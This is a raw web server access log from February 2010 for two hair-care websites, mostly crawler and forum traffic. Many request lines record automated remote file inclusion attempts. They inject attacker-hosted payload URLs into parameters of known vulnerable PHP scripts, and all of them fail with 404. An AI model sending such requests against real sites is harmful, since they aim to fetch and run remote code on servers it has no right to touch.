119.63.198.99 - - [21/Feb/2010:19:22:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12267 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:47 -0800] "GET /setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:47 -0800] "GET /logs/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:47 -0800] "GET /logs/access_100118.log%20%20/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:58 -0800] "GET /setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:58 -0800] "GET /logs/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:19:26:58 -0800] "GET /logs/access_100118.log/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.248 - - [21/Feb/2010:19:39:07 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.248 - - [21/Feb/2010:19:40:38 -0800] "GET /?D=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
58.150.99.144 - - [21/Feb/2010:19:43:37 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.55.227.145 - - [21/Feb/2010:19:48:34 -0800] "GET /logs/access.log//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.145 - - [21/Feb/2010:19:48:34 -0800] "GET /lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.145 - - [21/Feb/2010:19:48:34 -0800] "GET /logs//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [21/Feb/2010:19:50:59 -0800] "GET /lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [21/Feb/2010:19:51:35 -0800] "GET /logs//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [21/Feb/2010:19:51:35 -0800] "GET /logs/access.log//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.64.96.21 - - [21/Feb/2010:19:53:26 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
189.51.45.29 - - [21/Feb/2010:19:53:43 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
208.96.213.149 - - [21/Feb/2010:19:54:09 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
210.205.247.11 - - [21/Feb/2010:19:54:31 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
200.31.42.3 - - [21/Feb/2010:19:55:01 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
123.138.18.114 - - [21/Feb/2010:19:55:56 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
141.89.251.245 - - [21/Feb/2010:19:55:59 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
221.238.17.245 - - [21/Feb/2010:19:56:21 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
221.238.17.245 - - [21/Feb/2010:19:56:22 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
210.205.247.11 - - [21/Feb/2010:19:56:25 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
220.255.7.13 - - [21/Feb/2010:19:56:28 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
189.45.111.146 - - [21/Feb/2010:19:56:39 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
58.150.99.144 - - [21/Feb/2010:20:02:17 -0800] "GET /logs/access.log/bbs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
58.150.99.144 - - [21/Feb/2010:20:02:18 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
58.150.99.144 - - [21/Feb/2010:20:02:19 -0800] "GET /logs/bbs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
61.111.3.35 - - [21/Feb/2010:20:08:16 -0800] "GET /logs/access.log//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.111.3.35 - - [21/Feb/2010:20:08:16 -0800] "GET /logs//lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.111.3.35 - - [21/Feb/2010:20:08:17 -0800] "GET /lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.122.55.248 - - [21/Feb/2010:20:09:50 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9876 HTTP/1.1" 200 349 "http://search.yahoo.com/search?p=real+actual+incest+videos&ei=UTF-8&fr=hp-psnb&xargs=0&pstart=1&b=251&xa=7a5F.52r8wTxlnio_nJKzg--,1266898132" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "growlonghairfast.com"
208.115.111.245 - - [21/Feb/2010:20:17:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:23:22 -0800] "GET /logs//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:23:22 -0800] "GET /bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:23:22 -0800] "GET /logs/access.log%20%20//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:25:51 -0800] "GET /logs/access_100111.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:25:51 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:25:51 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:25:53 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:25:53 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:25:53 -0800] "GET /logs/access_100111.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:26:34 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:26:36 -0800] "GET /logs/access_100111.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:26:36 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.78.109.87 - - [21/Feb/2010:20:29:34 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:31:30 -0800] "GET /bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:31:30 -0800] "GET /logs/access.log%20%20//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:31:30 -0800] "GET /logs//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:32:33 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:32:34 -0800] "GET /logs/access_100111.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:32:34 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:34:21 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:34:21 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:34:21 -0800] "GET /logs/access.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.78.109.87 - - [21/Feb/2010:20:34:50 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:36:27 -0800] "GET /logs/access.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:36:27 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:36:27 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:36:47 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16907 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6604 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3248 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7434 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:14 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8255 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:18 -0800] "GET /logs/access_081215.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:24 -0800] "GET /logs/access_081222.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:29 -0800] "GET /logs/access_081229.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:34 -0800] "GET /logs/access_090105.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [21/Feb/2010:20:37:40 -0800] "GET /logs/access_090112.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:38:44 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:38:44 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:38:44 -0800] "GET /logs/access.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.102 - - [21/Feb/2010:20:39:24 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:39:24 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.102 - - [21/Feb/2010:20:39:24 -0800] "GET /logs/access_100118.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.192.139.164 - - [21/Feb/2010:20:39:59 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:39:59 -0800] "GET /bbs//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:39:59 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:42:45 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:42:45 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:42:45 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:44:09 -0800] "GET ///bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:44:09 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.192.139.164 - - [21/Feb/2010:20:44:09 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.202.62.167 - - [21/Feb/2010:20:50:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:06 -0800] "GET /include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:06 -0800] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:06 -0800] "GET /logs//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.202.62.167 - - [21/Feb/2010:20:50:08 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:11 -0800] "GET /logs/access_091123.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:33 -0800] "GET /logs//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:34 -0800] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:35 -0800] "GET /include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:50:38 -0800] "GET /include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [21/Feb/2010:20:50:38 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [21/Feb/2010:20:50:39 -0800] "GET /logs//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [21/Feb/2010:20:50:39 -0800] "GET /logs/access_091123.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [21/Feb/2010:20:51:05 -0800] "GET /include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [21/Feb/2010:20:51:06 -0800] "GET /logs//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [21/Feb/2010:20:51:06 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:54:08 -0800] "GET /logs/access.log//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:58:58 -0800] "GET /bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:58:59 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:20:59:00 -0800] "GET /logs/access.log//bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.136.23.172 - - [21/Feb/2010:20:59:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:20:59:25 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.136.23.172 - - [21/Feb/2010:20:59:25 -0800] "GET /skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [21/Feb/2010:21:02:05 -0800] "GET /logs//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:21:02:05 -0800] "GET /logs/access.log//bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [21/Feb/2010:21:02:05 -0800] "GET /bbs//include/admin.lib.inc.php?site_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.136.23.172 - - [21/Feb/2010:21:02:06 -0800] "GET /logs/access_091214.log%20%20//skin/zero_vote/error.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
